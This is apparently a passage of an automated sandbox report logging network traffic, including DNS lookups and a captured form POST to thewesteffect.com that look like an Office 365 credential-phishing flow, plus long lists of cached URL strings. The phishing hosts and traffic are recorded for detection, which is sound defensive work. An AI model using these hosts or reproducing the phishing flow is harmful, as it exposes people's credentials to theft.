          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficDNS traffic detected: DNS query: ljppcv.us8.list-manage.com
          Source: global trafficDNS traffic detected: DNS query: link.mail.beehiiv.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: factiv.za.com
          Source: global trafficDNS traffic detected: DNS query: thewesteffect.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: unknownHTTP traffic detected: POST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N HTTP/1.1Host: thewesteffect.comConnection: keep-aliveContent-Length: 139036Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://thewesteffect.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: sets.json.0.drString found in binary or memory: https://07c225f3.online
          Source: sets.json.0.drString found in binary or memory: https://24.hu
          Source: chromecache_72.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_69.2.dr, chromecache_72.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_69.2.dr, chromecache_72.2.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: sets.json.0.drString found in binary or memory: https://aajtak.in
          Source: sets.json.0.drString found in binary or memory: https://abczdrowie.pl
          Source: sets.json.0.drString found in binary or memory: https://alice.tw
          Source: sets.json.0.drString found in binary or memory: https://ambitionbox.com
          Source: sets.json.0.drString found in binary or memory: https://autobild.de
          Source: sets.json.0.drString found in binary or memory: https://baomoi.com
          Source: sets.json.0.drString found in binary or memory: https://bild.de
          Source: sets.json.0.drString found in binary or memory: https://blackrock.com
          Source: sets.json.0.drString found in binary or memory: https://blackrockadvisorelite.it
          Source: sets.json.0.drString found in binary or memory: https://bluradio.com
          Source: sets.json.0.drString found in binary or memory: https://bolasport.com
          Source: sets.json.0.drString found in binary or memory: https://bonvivir.com
          Source: sets.json.0.drString found in binary or memory: https://bumbox.com
          Source: sets.json.0.drString found in binary or memory: https://businessinsider.com.pl
          Source: sets.json.0.drString found in binary or memory: https://businesstoday.in
          Source: sets.json.0.drString found in binary or memory: https://cachematrix.com
          Source: sets.json.0.drString found in binary or memory: https://cafemedia.com
          Source: sets.json.0.drString found in binary or memory: https://caracoltv.com
          Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.be
          Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.com
          Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.fr
          Source: sets.json.0.drString found in binary or memory: https://cardsayings.net
          Source: chromecache_69.2.dr, chromecache_72.2.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_65.2.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: sets.json.0.drString found in binary or memory: https://chatbot.com
          Source: sets.json.0.drString found in binary or memory: https://chennien.com
          Source: sets.json.0.drString found in binary or memory: https://citybibleforum.org
          Source: sets.json.0.drString found in binary or memory: https://clarosports.com
          Source: sets.json.0.drString found in binary or memory: https://clmbtech.com
          Source: sets.json.0.drString found in binary or memory: https://closeronline.co.uk
          Source: sets.json.0.drString found in binary or memory: https://clubelpais.com.uy
          Source: sets.json.0.drString found in binary or memory: https://cmxd.com.mx
          Source: sets.json.0.drString found in binary or memory: https://cognitive-ai.ru
          Source: sets.json.0.drString found in binary or memory: https://cognitiveai.ru
          Source: sets.json.0.drString found in binary or memory: https://commentcamarche.com
          Source: sets.json.0.drString found in binary or memory: https://commentcamarche.net
          Source: sets.json.0.drString found in binary or memory: https://computerbild.de
          Source: sets.json.0.drString found in binary or memory: https://content-loader.com
          Source: sets.json.0.drString found in binary or memory: https://cookreactor.com
          Source: sets.json.0.drString found in binary or memory: https://cricbuzz.com
          Source: sets.json.0.drString found in binary or memory: https://css-load.com
          Source: sets.json.0.drString found in binary or memory: https://deccoria.pl
          Source: sets.json.0.drString found in binary or memory: https://deere.com
          Source: sets.json.0.drString found in binary or memory: https://desimartini.com
          Source: sets.json.0.drString found in binary or memory: https://dewarmsteweek.be
          Source: sets.json.0.drString found in binary or memory: https://drimer.io
          Source: sets.json.0.drString found in binary or memory: https://drimer.travel
          Source: sets.json.0.drString found in binary or memory: https://economictimes.com
          Source: sets.json.0.drString found in binary or memory: https://een.be
          Source: sets.json.0.drString found in binary or memory: https://efront.com
          Source: sets.json.0.drString found in binary or memory: https://eleconomista.net
          Source: sets.json.0.drString found in binary or memory: https://elfinancierocr.com
          Source: sets.json.0.drString found in binary or memory: https://elgrafico.com
          Source: sets.json.0.drString found in binary or memory: https://ella.sv
          Source: sets.json.0.drString found in binary or memory: https://elpais.com.uy
          Source: sets.json.0.drString found in binary or memory: https://elpais.uy
          Source: sets.json.0.drString found in binary or memory: https://etfacademy.it
          Source: sets.json.0.drString found in binary or memory: https://eworkbookcloud.com
          Source: sets.json.0.drString found in binary or memory: https://eworkbookrequest.com
          Source: sets.json.0.drString found in binary or memory: https://fakt.pl
          Source: sets.json.0.drString found in binary or memory: https://finn.no
          Source: sets.json.0.drString found in binary or memory: https://firstlook.biz
          Source: sets.json.0.drString found in binary or memory: https://gallito.com.uy
          Source: sets.json.0.drString found in binary or memory: https://geforcenow.com
          Source: sets.json.0.drString found in binary or memory: https://gettalkdesk.com
          Source: sets.json.0.drString found in binary or memory: https://gliadomain.com
          Source: sets.json.0.drString found in binary or memory: https://gnttv.com
          Source: chromecache_69.2.dr, chromecache_72.2.drString found in binary or memory: https://google.com
          Source: sets.json.0.drString found in binary or memory: https://graziadaily.co.uk
          Source: sets.json.0.drString found in binary or memory: https://grid.id
          Source: sets.json.0.drString found in binary or memory: https://gridgames.app
          Source: sets.json.0.drString found in binary or memory: https://growthrx.in
          Source: sets.json.0.drString found in binary or memory: https://grupolpg.sv
          Source: sets.json.0.drString found in binary or memory: https://gujaratijagran.com
          Source: sets.json.0.drString found in binary or memory: https://hapara.com
          Source: sets.json.0.drString found in binary or memory: https://hazipatika.com
          Source: sets.json.0.drString found in binary or memory: https://hc1.com
          Source: sets.json.0.drString found in binary or memory: https://hc1.global
          Source: sets.json.0.drString found in binary or memory: https://hc1cas.com
          Source: sets.json.0.drString found in binary or memory: https://hc1cas.global
          Source: sets.json.0.drString found in binary or memory: https://healthshots.com
          Source: sets.json.0.drString found in binary or memory: https://hearty.app
          Source: sets.json.0.drString found in binary or memory: https://hearty.gift
          Source: sets.json.0.drString found in binary or memory: https://hearty.me
          Source: sets.json.0.drString found in binary or memory: https://heartymail.com
          Source: sets.json.0.drString found in binary or memory: https://heatworld.com
          Source: sets.json.0.drString found in binary or memory: https://helpdesk.com
          Source: sets.json.0.drString found in binary or memory: https://hindustantimes.com
          Source: sets.json.0.drString found in binary or memory: https://hj.rs
          Source: sets.json.0.drString found in binary or memory: https://hjck.com
          Source: sets.json.0.drString found in binary or memory: https://html-load.cc
          Source: sets.json.0.drString found in binary or memory: https://html-load.com
          Source: sets.json.0.drString found in binary or memory: https://human-talk.org
          Source: sets.json.0.drString found in binary or memory: https://idbs-cloud.com
          Source: sets.json.0.drString found in binary or memory: https://idbs-dev.com
          Source: sets.json.0.drString found in binary or memory: https://idbs-eworkbook.com
          Source: sets.json.0.drString found in binary or memory: https://idbs-staging.com
          Source: sets.json.0.drString found in binary or memory: https://img-load.com
          Source: sets.json.0.drString found in binary or memory: https://indiatimes.com
          Source: sets.json.0.drString found in binary or memory: https://indiatoday.in
          Source: sets.json.0.drString found in binary or memory: https://indiatodayne.in
          Source: sets.json.0.drString found in binary or memory: https://infoedgeindia.com
          Source: sets.json.0.drString found in binary or memory: https://interia.pl
          Source: sets.json.0.drString found in binary or memory: https://intoday.in
          Source: sets.json.0.drString found in binary or memory: https://iolam.it
          Source: sets.json.0.drString found in binary or memory: https://ishares.com
          Source: sets.json.0.drString found in binary or memory: https://jagran.com
          Source: sets.json.0.drString found in binary or memory: https://johndeere.com
          Source: sets.json.0.drString found in binary or memory: https://journaldesfemmes.com
          Source: sets.json.0.drString found in binary or memory: https://journaldesfemmes.fr
          Source: sets.json.0.drString found in binary or memory: https://journaldunet.com
          Source: sets.json.0.drString found in binary or memory: https://journaldunet.fr
          Source: sets.json.0.drString found in binary or memory: https://joyreactor.cc
          Source: sets.json.0.drString found in binary or memory: https://joyreactor.com
          Source: sets.json.0.drString found in binary or memory: https://kaksya.in
          Source: sets.json.0.drString found in binary or memory: https://knowledgebase.com
          Source: sets.json.0.drString found in binary or memory: https://kompas.com
          Source: sets.json.0.drString found in binary or memory: https://kompas.tv
          Source: sets.json.0.drString found in binary or memory: https://kompasiana.com
          Source: sets.json.0.drString found in binary or memory: https://lanacion.com.ar
          Source: sets.json.0.drString found in binary or memory: https://landyrev.com
          Source: sets.json.0.drString found in binary or memory: https://landyrev.ru
          Source: sets.json.0.drString found in binary or memory: https://laprensagrafica.com
          Source: sets.json.0.drString found in binary or memory: https://lateja.cr
          Source: sets.json.0.drString found in binary or memory: https://libero.it
          Source: sets.json.0.drString found in binary or memory: https://linternaute.com
          Source: sets.json.0.drString found in binary or memory: https://linternaute.fr
          Source: sets.json.0.drString found in binary or memory: https://livechat.com
          Source: sets.json.0.drString found in binary or memory: https://livechatinc.com
          Source: sets.json.0.drString found in binary or memory: https://livehindustan.com
          Source: sets.json.0.drString found in binary or memory: https://livemint.com
          Source: chromecache_69.2.dr, chromecache_72.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_72.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: sets.json.0.drString found in binary or memory: https://max.auto
          Source: sets.json.0.drString found in binary or memory: https://medonet.pl
          Source: sets.json.0.drString found in binary or memory: https://meo.pt
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.cl
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.co.cr
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ar
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.bo
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.co
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.do
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ec
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.gt
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.hn
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.mx
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ni
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.pa
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.pe
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.py
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.sv
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.uy
          Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ve
          Source: sets.json.0.drString found in binary or memory: https://mercadolivre.com
          Source: sets.json.0.drString found in binary or memory: https://mercadolivre.com.br
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.cl
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.ar
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.br
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.co
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.ec
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.mx
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.pe
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.uy
          Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.ve
          Source: sets.json.0.drString found in binary or memory: https://mercadoshops.cl
          Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com
          Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.ar
          Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.br
          Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.co
          Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.mx
          Source: sets.json.0.drString found in binary or memory: https://mighty-app.appspot.com
          Source: sets.json.0.drString found in binary or memory: https://mightytext.net
          Source: sets.json.0.drString found in binary or memory: https://mittanbud.no
          Source: sets.json.0.drString found in binary or memory: https://money.pl
          Source: sets.json.0.drString found in binary or memory: https://motherandbaby.com
          Source: sets.json.0.drString found in binary or memory: https://mystudentdashboard.com
          Source: sets.json.0.drString found in binary or memory: https://nacion.com
          Source: sets.json.0.drString found in binary or memory: https://naukri.com
          Source: sets.json.0.drString found in binary or memory: https://nidhiacademyonline.com
          Source: sets.json.0.drString found in binary or memory: https://nien.co
          Source: sets.json.0.drString found in binary or memory: https://nien.com
          Source: sets.json.0.drString found in binary or memory: https://nien.org
          Source: sets.json.0.drString found in binary or memory: https://nlc.hu
          Source: sets.json.0.drString found in binary or memory: https://nosalty.hu
          Source: sets.json.0.drString found in binary or memory: https://noticiascaracol.com
          Source: sets.json.0.drString found in binary or memory: https://nourishingpursuits.com
          Source: sets.json.0.drString found in binary or memory: https://nvidia.com
          Source: sets.json.0.drString found in binary or memory: https://o2.pl
          Source: sets.json.0.drString found in binary or memory: https://ocdn.eu
          Source: sets.json.0.drString found in binary or memory: https://onet.pl
          Source: sets.json.0.drString found in binary or memory: https://ottplay.com
          Source: sets.json.0.drString found in binary or memory: https://p106.net
          Source: sets.json.0.drString found in binary or memory: https://p24.hu
          Source: sets.json.0.drString found in binary or memory: https://paula.com.uy
          Source: sets.json.0.drString found in binary or memory: https://pdmp-apis.no
          Source: sets.json.0.drString found in binary or memory: https://phonandroid.com
          Source: sets.json.0.drString found in binary or memory: https://player.pl
          Source: sets.json.0.drString found in binary or memory: https://plejada.pl
          Source: sets.json.0.drString found in binary or memory: https://poalim.site
          Source: sets.json.0.drString found in binary or memory: https://poalim.xyz
          Source: sets.json.0.drString found in binary or memory: https://pomponik.pl
          Source: sets.json.0.drString found in binary or memory: https://portalinmobiliario.com
          Source: sets.json.0.drString found in binary or memory: https://prisjakt.no
          Source: sets.json.0.drString found in binary or memory: https://pudelek.pl
          Source: sets.json.0.drString found in binary or memory: https://punjabijagran.com
          Source: sets.json.0.drString found in binary or memory: https://radio1.be
          Source: sets.json.0.drString found in binary or memory: https://radio2.be
          Source: sets.json.0.drString found in binary or memory: https://reactor.cc
          Source: sets.json.0.drString found in binary or memory: https://repid.org
          Source: sets.json.0.drString found in binary or memory: https://reshim.org
          Source: sets.json.0.drString found in binary or memory: https://rws1nvtvt.com
          Source: sets.json.0.drString found in binary or memory: https://rws2nvtvt.com
          Source: sets.json.0.drString found in binary or memory: https://rws3nvtvt.com
          Source: sets.json.0.drString found in binary or memory: https://sackrace.ai
          Source: sets.json.0.drString found in binary or memory: https://salemoveadvisor.com
          Source: sets.json.0.drString found in binary or memory: https://salemovefinancial.com
          Source: sets.json.0.drString found in binary or memory: https://salemovetravel.com
          Source: sets.json.0.drString found in binary or memory: https://samayam.com
          Source: sets.json.0.drString found in binary or memory: https://sapo.io
          Source: sets.json.0.drString found in binary or memory: https://sapo.pt
          Source: sets.json.0.drString found in binary or memory: https://shock.co
          Source: sets.json.0.drString found in binary or memory: https://smaker.pl
          Source: sets.json.0.drString found in binary or memory: https://smoney.vn
          Source: sets.json.0.drString found in binary or memory: https://smpn106jkt.sch.id
          Source: sets.json.0.drString found in binary or memory: https://socket-to-me.vip
          Source: sets.json.0.drString found in binary or memory: https://songshare.com
          Source: sets.json.0.drString found in binary or memory: https://songstats.com
          Source: sets.json.0.drString found in binary or memory: https://sporza.be
          Source: sets.json.0.drString found in binary or memory: https://standardsandpraiserepurpose.com
          Source: sets.json.0.drString found in binary or memory: https://startlap.hu
          Source: sets.json.0.drString found in binary or memory: https://startupislandtaiwan.com
          Source: sets.json.0.drString found in binary or memory: https://startupislandtaiwan.net
          Source: sets.json.0.drString found in binary or memory: https://startupislandtaiwan.org
          Source: sets.json.0.drString found in binary or memory: https://stripe.com
          Source: sets.json.0.drString found in binary or memory: https://stripe.network
          Source: sets.json.0.drString found in binary or memory: https://stripecdn.com
          Source: sets.json.0.drString found in binary or memory: https://supereva.it
          Source: sets.json.0.drString found in binary or memory: https://takeabreak.co.uk
          Source: sets.json.0.drString found in binary or memory: https://talkdeskqaid.com
          Source: sets.json.0.drString found in binary or memory: https://talkdeskstgid.com
          Source: sets.json.0.drString found in binary or memory: https://teacherdashboard.com
          Source: sets.json.0.drString found in binary or memory: https://technology-revealed.com
          Source: sets.json.0.drString found in binary or memory: https://terazgotuje.pl
          Source: sets.json.0.drString found in binary or memory: https://text.com
          Source: sets.json.0.drString found in binary or memory: https://textyserver.appspot.com
          Source: sets.json.0.drString found in binary or memory: https://the42.ie
          Source: sets.json.0.drString found in binary or memory: https://thejournal.ie
          Source: sets.json.0.drString found in binary or memory: https://thirdspace.org.au
          Source: sets.json.0.drString found in binary or memory: https://timesinternet.in
          Source: sets.json.0.drString found in binary or memory: https://timesofindia.com
          Source: sets.json.0.drString found in binary or memory: https://tolteck.app
          Source: sets.json.0.drString found in binary or memory: https://tolteck.com
          Source: sets.json.0.drString found in binary or memory: https://top.pl
          Source: sets.json.0.drString found in binary or memory: https://tribunnews.com
          Source: sets.json.0.drString found in binary or memory: https://trytalkdesk.com
          Source: sets.json.0.drString found in binary or memory: https://tucarro.com
          Source: sets.json.0.drString found in binary or memory: https://tucarro.com.co
          Source: sets.json.0.drString found in binary or memory: https://tucarro.com.ve
          Source: sets.json.0.drString found in binary or memory: https://tvid.in
          Source: sets.json.0.drString found in binary or memory: https://tvn.pl
          Source: sets.json.0.drString found in binary or memory: https://tvn24.pl
